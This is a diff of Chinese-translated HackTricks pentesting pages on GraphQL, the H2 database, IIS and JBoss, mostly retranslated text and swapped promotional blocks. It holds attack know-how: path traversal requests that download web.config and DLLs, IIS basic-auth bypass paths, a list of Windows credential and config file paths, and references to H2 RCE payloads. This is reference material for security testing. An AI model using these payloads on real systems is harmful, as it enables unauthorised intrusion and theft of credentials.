* [**https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696**](https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696)
@ -539,16 +540,17 @@ valid
* [**https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696**](https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696)
* [**https://portswigger.net/web-security/graphql**](https://portswigger.net/web-security/graphql)
{% hint style="success" %}
学习和实践AWS黑客攻击<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践GCP黑客攻击<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家(GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>支持HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的 **公司在 HackTricks 中做广告****下载 PDF 版本的 HackTricks**,请查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索 [**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家 [**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* 通过向 **HackTricks****HackTricks Cloud** github 仓库提交 PR 来分享您的黑客技巧。
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)或**在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github库提交PR分享黑客技巧。
</details>
{% endhint %}

44
network-services-pentesting/pentesting-web/h2-java-sql-database.md
View file

@ -1,28 +1,29 @@
# H2 - Java SQL数据库
{% hint style="success" %}
学习与实践AWS黑客技术<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践GCP黑客技术<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家(GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**Telegram群组**](https://t.me/peass)或**关注**我们在**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub库提交PR分享黑客技巧。
</details>
{% endhint %}
官方页面[https://www.h2database.com/html/main.html](https://www.h2database.com/html/main.html)
官方网站[https://www.h2database.com/html/main.html](https://www.h2database.com/html/main.html)
## 访问
您可以指定一个**不存在的数据库名称**来**创建一个新的数据库,而无需有效凭据****未经身份验证**
您可以指示一个**不存在的数据库名称**以**在没有有效凭据的情况下创建新数据库****未认证**
![](<../../.gitbook/assets/image (131).png>)
或者如果您知道例如**mysql正在运行**,并且您知道该数据库的**数据库名称**和**凭据**,您可以直接访问它:
或者如果您知道例如**mysql正在运行**,并且您知道该数据库的**名称**和**凭据**,您可以直接访问它:
![](<../../.gitbook/assets/image (201).png>)
@ -30,11 +31,11 @@ _**来自HTB的Hawk盒子的技巧。**_
## **RCE**
在与H2数据库通信的情况下检查此利用以获得对其的RCE[https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed](https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed)
访问H2数据库后请查看此漏洞以获取RCE[https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed](https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed)
## H2 SQL注入到RCE
在[**这篇文章**](https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/)中,解释了一个有效负载,通过**SQL注入**滥用**H2数据库**来获得**RCE**。
在[**这篇文章**](https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/)中,解释了一种有效载荷,通过利用**SQL注入**获取**通过H2数据库的RCE**。
```json
[...]
"details":
@ -45,16 +46,17 @@ _**来自HTB的Hawk盒子的技巧。**_
},
[...]
```
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
其他支持HackTricks的方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

132
network-services-pentesting/pentesting-web/iis-internet-information-services.md
View file

@ -1,26 +1,27 @@
# IIS - Internet Information Services
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中被广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
### [WhiteIntel](https://whiteintel.io)
<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**推动的搜索引擎,提供**免费**功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**
[**WhiteIntel**](https://whiteintel.io) 是一个由 **暗网** 驱动的搜索引擎,提供 **免费** 功能以检查公司或其客户是否被 **窃取恶意软件** **入侵**
WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel 的主要目标是打击由于信息窃取恶意软件导致的账户接管和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
@ -35,14 +36,14 @@ WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫
* config
* php
## 内部IP地址泄露
## 内部 IP 地址泄露
在任何获得302响应的IIS服务器上您可以尝试剥离Host标头并使用HTTP/1.0在响应内部Location标头可能会指向内部IP地址:
在任何 IIS 服务器上,如果您获得 302您可以尝试去掉 Host 头并使用 HTTP/1.0,响应中的 Location 头可能会指向内部 IP 地址:
```
nc -v domain.com 80
openssl s_client -connect domain.com:443
```
回应披露内部IP
响应泄露内部IP
```
GET / HTTP/1.0
@ -55,9 +56,9 @@ X-FEServer: NHEXCHANGE2016
```
## 执行 .config 文件
您可以上传 .config 文件并使用它们来执行代码。一种方法是在文件末尾添加代码,放在 HTML 注释中:[在此下载示例](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config/web.config)
您可以上传 .config 文件并使用它们执行代码。实现这一点的一种方法是在文件末尾的 HTML 注释中附加代码:[在这里下载示例](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config/web.config)
有关更多信息和利用此漏洞的技术,请查看[此处](https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/)
有关利用此漏洞的更多信息和技术 [在这里](https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/)
## IIS 发现暴力破解
@ -65,7 +66,7 @@ X-FEServer: NHEXCHANGE2016
{% file src="../../.gitbook/assets/iisfinal.txt" %}
这个列表是通过合并以下列表的内容创建的:
是通过合并以下列表的内容创建的:
[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt)\
[http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html](http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html)\
@ -74,64 +75,64 @@ X-FEServer: NHEXCHANGE2016
[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt)\
[https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt](https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt)
使用时不要添加任何扩展名,需要扩展名的文件已经包含在内
使用时不要添加任何扩展名,所需的文件已经包含它
## 路径遍历
### 泄露源代码
查看完整的解说[https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html](https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html)
查看完整的写作在[https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html](https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html)
{% hint style="info" %}
简而言之,应用程序的文件夹中有几个包含对 "**assemblyIdentity**" 文件和 "**namespaces**" 的引用的 web.config 文件。有了这些信息,就可以知道 **可执行文件的位置** 并下载它们。\
下载的 Dlls 中,还可以找到 **新的命名空间**,您应该尝试访问并获取 web.config 文件,以查找新的命名空间和 assemblyIdentity。\
总结来说,应用程序的文件夹中有多个 web.config 文件,里面引用了 "**assemblyIdentity**" 文件和 "**namespaces**"。通过这些信息,可以知道 **可执行文件的位置** 并下载它们。\
**下载的 Dlls** 中,还可以找到 **新的 namespaces**,您应该尝试访问并获取 web.config 文件,以便找到新的 namespaces 和 assemblyIdentity。\
此外,文件 **connectionstrings.config****global.asax** 可能包含有趣的信息。\\
{% endhint %}
**.Net MVC 应用程序** 中,**web.config** 文件通过 **"assemblyIdentity"** XML 标签指定应用程序依赖的每个二进制文件。
**.Net MVC 应用程序** 中,**web.config** 文件通过 **"assemblyIdentity"** XML 标签指定应用程序依赖的每个二进制文件,起着至关重要的作用
### **探索二进制文件**
下面是访问 **web.config** 文件的示例:
访问 **web.config** 文件的示例如下
```markup
GET /download_page?id=..%2f..%2fweb.config HTTP/1.1
Host: example-mvc-application.minded
```
这个请求揭示了各种设置和依赖关系,比如:
此请求揭示了各种设置和依赖关系,例如:
* **EntityFramework** 版本
* 用于网页、客户端验证和 JavaScript 的 **AppSettings**
* 用于身份验证和运行时的 **System.web** 配置
* **AppSettings** 用于网页、客户端验证和JavaScript
* **System.web** 身份验证和运行时的配置
* **System.webServer** 模块设置
* 用于许多库的 **Runtime** 组件绑定,比**Microsoft.Owin**、**Newtonsoft.Json** 和 **System.Web.Mvc**
* **Runtime** 程序集绑定,适用于多个库,**Microsoft.Owin**、**Newtonsoft.Json** 和 **System.Web.Mvc**
这些设置表明某些文件,比如 **/bin/WebGrease.dll**,位于应用程序的 /bin 文件夹中
这些设置表明某些文件,例如 **/bin/WebGrease.dll**,位于应用程序的 /bin 文件夹内
### **根目录文件**
根目录中的文件,**/global.asax** 和 **/connectionstrings.config**其中包含敏感密码),对应用程序的配置和操作至关重要。
根目录中找到的文件,如 **/global.asax** 和 **/connectionstrings.config**(包含敏感密码),对应用程序的配置和操作至关重要。
### **命名空间和 Web.Config**
MVC 应用程序还为特定命名空间定义额外的 **web.config 文件**,以避免在每个文件中重复声明,如通过请求下载另一个 **web.config** 所示:
MVC 应用程序还为特定命名空间定义额外的 **web.config 文件**,以避免在每个文件中重复声明,如请求下载另一个 **web.config** 所示:
```markup
GET /download_page?id=..%2f..%2fViews/web.config HTTP/1.1
Host: example-mvc-application.minded
```
### **下载 DLLs**
### **下载 DLL**
提到自定义命名空间暗示着一个名为 "**WebApplication1**" 的 DLL 存在于 /bin 目录中。接着展示了下载 **WebApplication1.dll** 的请求:
提到自定义命名空间暗示在 /bin 目录中存在一个名为 "**WebApplication1**" 的 DLL。接下来示了下载 **WebApplication1.dll** 的请求:
```markup
GET /download_page?id=..%2f..%2fbin/WebApplication1.dll HTTP/1.1
Host: example-mvc-application.minded
```
这表明在/bin目录中存在其他重要的DLL比如**System.Web.Mvc.dll**和**System.Web.Optimization.dll**
这表明在 /bin 目录中存在其他重要的 DLL例如 **System.Web.Mvc.dll****System.Web.Optimization.dll**
在一个场景中一个DLL导入了一个名为**WebApplication1.Areas.Minded**的命名空间攻击者可能推断出在可预测路径中存在其他web.config文件比如**/area-name/Views/**,其中包含特定配置和对/bin文件夹中其他DLL的引用。例如对**/Minded/Views/web.config**的请求可以显示配置和命名空间表明另一个DLL **WebApplication1.AdditionalFeatures.dll**的存在
在一个 DLL 导入名为 **WebApplication1.Areas.Minded** 的命名空间的场景中,攻击者可能推断出在可预测路径中存在其他 web.config 文件,例如 **/area-name/Views/**,其中包含特定的配置和对 /bin 文件夹中其他 DLL 的引用。例如,对 **/Minded/Views/web.config** 的请求可以揭示配置和命名空间,表明存在另一个 DLL **WebApplication1.AdditionalFeatures.dll**
### 常见文件
来自[这里](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)
来自 [这里](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)
```
C:\Apache\conf\httpd.conf
C:\Apache\logs\access.log
@ -208,23 +209,23 @@ C:\xampp\security\webdav.htpasswd
C:\xampp\sendmail\sendmail.ini
C:\xampp\tomcat\conf\server.xml
```
## HTTPAPI 2.0 404错误
## HTTPAPI 2.0 404 错误
如果你看到如下错误:
![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (10) (2).png>)
![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (10) (2).png>)
这意味着服务器**没有收到正确的域名**在Host头部。\
为了访问网页,你可以查看提供的**SSL证书**,也许你可以在其中找到域名/子域名。如果找不到,你可能需要**暴力破解虚拟主机**直到找到正确的。
这意味着服务器**没有在 Host 头中接收到正确的域名**。\
为了访问网页,你可以查看提供的**SSL 证书**,也许可以在其中找到域名/子域名。如果没有,你可能需要**暴力破解 VHosts**直到找到正确的。
## 值得寻找的旧版IIS漏洞
## 值得关注的旧 IIS 漏洞
### Microsoft IIS波浪符“\~”漏洞/特性 - 短文件/文件夹名泄露
### Microsoft IIS 波浪字符“\~” 漏洞/特性 短文件/文件夹名称泄露
你可以尝试使用这个**技术**来**枚举**每个发现的文件夹中的文件和文件夹(即使需要基本身份验证)。\
这种技术的主要限制是,如果服务器存在漏洞,**它只能找到每个文件/文件夹名称的前6个字母和文件扩展名的前3个字母**。
你可以尝试使用此**技术**来**枚举文件夹和文件**,即使它需要基本身份验证。\
如果服务器存在漏洞,这种技术的主要限制是**它只能找到每个文件/文件夹名称的前 6 个字母和文件扩展名的前 3 个字母**。
你可以使用[https://github.com/irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner)来测试这个漏洞:`java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/`
你可以使用 [https://github.com/irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner) 来测试此漏洞:`java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/`
![](<../../.gitbook/assets/image (844).png>)
@ -234,17 +235,17 @@ C:\xampp\tomcat\conf\server.xml
### 基本身份验证绕过
尝试绕过基本身份验证(**IIS 7.5**访问:`/admin:$i30:$INDEX_ALLOCATION/admin.php`或`/admin::$INDEX_ALLOCATION/admin.php`
**绕过**基本身份验证(**IIS 7.5**)尝试访问:`/admin:$i30:$INDEX_ALLOCATION/admin.php` `/admin::$INDEX_ALLOCATION/admin.php`
你可以尝试**结合**这个**漏洞**和上一个来发现新的**文件夹**并**绕过**身份验证。
你可以尝试将此**漏洞**与上一个结合,以找到新的**文件夹**并**绕过**身份验证。
## ASP.NET Trace.AXD启用调试
## ASP.NET Trace.AXD 启用调试
ASP.NET包含一个调试模式,其文件名为`trace.axd`。
ASP.NET 包含调试模式,其文件名为 `trace.axd`
会详细记录一段时间内发送到应用程序的所有请求
保持对在一段时间内对应用程序发出的所有请求的详细日志
这些信息包括远程客户端IP、会话ID、所有请求和响应cookie、物理路径、源代码信息甚至可能包括用户名和密码。
此信息包括远程客户端 IP、会话 ID、所有请求和响应 cookie、物理路径、源代码信息甚至可能包括用户名和密码。
[https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/](https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/)
@ -252,19 +253,19 @@ ASP.NET包含一个调试模式其文件名为`trace.axd`。
## ASPXAUTH Cookie
ASPXAUTH使用以下信息
ASPXAUTH 使用以下信息:
* **`validationKey`**(字符串):用于签名验证的十六进制编码密钥。
* **`decryptionMethod`**(字符串):(默认“AES”
* **`decryptionMethod`**字符串默认“AES”
* **`decryptionIV`**(字符串):十六进制编码的初始化向量(默认为零向量)。
* **`decryptionKey`**(字符串):用于解密的十六进制编码密钥。
然而,些人会使用这些参数的**默认值**,并将用户的**电子邮件作为cookie**。因此,如果你能找到一个使用ASPXAUTH cookie的**相同平台**的网站并在受攻击的服务器上创建一个使用要模拟用户的用户的电子邮件的用户你可能能够在第一个服务器中使用第二个服务器的cookie**模拟用户**。\
种攻击在这个[**writeup**](https://infosecwriteups.com/how-i-hacked-facebook-part-two-ffab96d57b19)中起作用
然而,些人会使用这些参数的**默认值**,并将**用户的电子邮件作为 cookie**。因此,如果你能找到一个使用**相同平台**的网页,并且使用 ASPXAUTH cookie你**在被攻击的服务器上创建一个与要冒充的用户相同的电子邮件的用户**,你可能能够在第一个服务器中**使用第二个服务器的 cookie**并冒充该用户。\
个攻击在这个 [**写作**](https://infosecwriteups.com/how-i-hacked-facebook-part-two-ffab96d57b19) 中有效
## 使用缓存密码绕过IIS身份验证CVE-2022-30209<a href="#id-3-iis-authentication-bypass" id="id-3-iis-authentication-bypass"></a>
## IIS 身份验证绕过与缓存密码 (CVE-2022-30209) <a href="#id-3-iis-authentication-bypass" id="id-3-iis-authentication-bypass"></a>
[完整报告在此处](https://blog.orange.tw/2022/08/lets-dance-in-the-cache-destabilizing-hash-table-on-microsoft-iis.html):代码中的一个错误**未正确检查用户提供的密码**,因此,如果**密码哈希命中已在缓存中的密钥**攻击者将能够以该用户身份登录。
[完整报告在这里](https://blog.orange.tw/2022/08/lets-dance-in-the-cache-destabilizing-hash-table-on-microsoft-iis.html):代码中的一个错误**没有正确检查用户提供的密码**,因此一个**密码哈希命中缓存中已存在的键**的攻击者将能够以该用户身份登录。
```python
# script for sanity check
> type test.py
@ -288,24 +289,25 @@ HTTP/1.1 200 OK
<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**
[**WhiteIntel**](https://whiteintel.io) 是一个由 **暗网** 驱动的搜索引擎,提供 **免费** 功能以检查公司或其客户是否被 **窃取恶意软件** **泄露**
WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel 的主要目标是打击由于信息窃取恶意软件导致的账户接管和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
{% embed url="https://whiteintel.io" %}
{% hint style="success" %}
学习与实践 AWS Hacking<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP Hacking<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

52
network-services-pentesting/pentesting-web/jboss.md
View file

@ -1,58 +1,60 @@
# JBOSS
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>
**漏洞赏金提示****注册**Intigriti这是一家由黑客创建的高级**漏洞赏金平台**!立即加入我们,访问[**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达**$100,000**的赏金!
**漏洞赏金提示****注册** **Intigriti**,一个由黑客为黑客创建的高级 **漏洞赏金平台**!今天就加入我们 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金!
{% embed url="https://go.intigriti.com/hacktricks" %}
## 枚举和利用技术
在评估Web应用程序的安全性时某些路径如_/web-console/ServerInfo.jsp_和_/status?full=true_对于揭示**服务器详细信息**至关重要。对于JBoss服务器诸如_/admin-console_、_/jmx-console_、_/management_和_/web-console_等路径可能至关重要。这些路径可能允许访问具有默认凭据通常设置为**admin/admin**)的**管理servlets**。此访问便于通过特定servlet与MBeans进行交互:
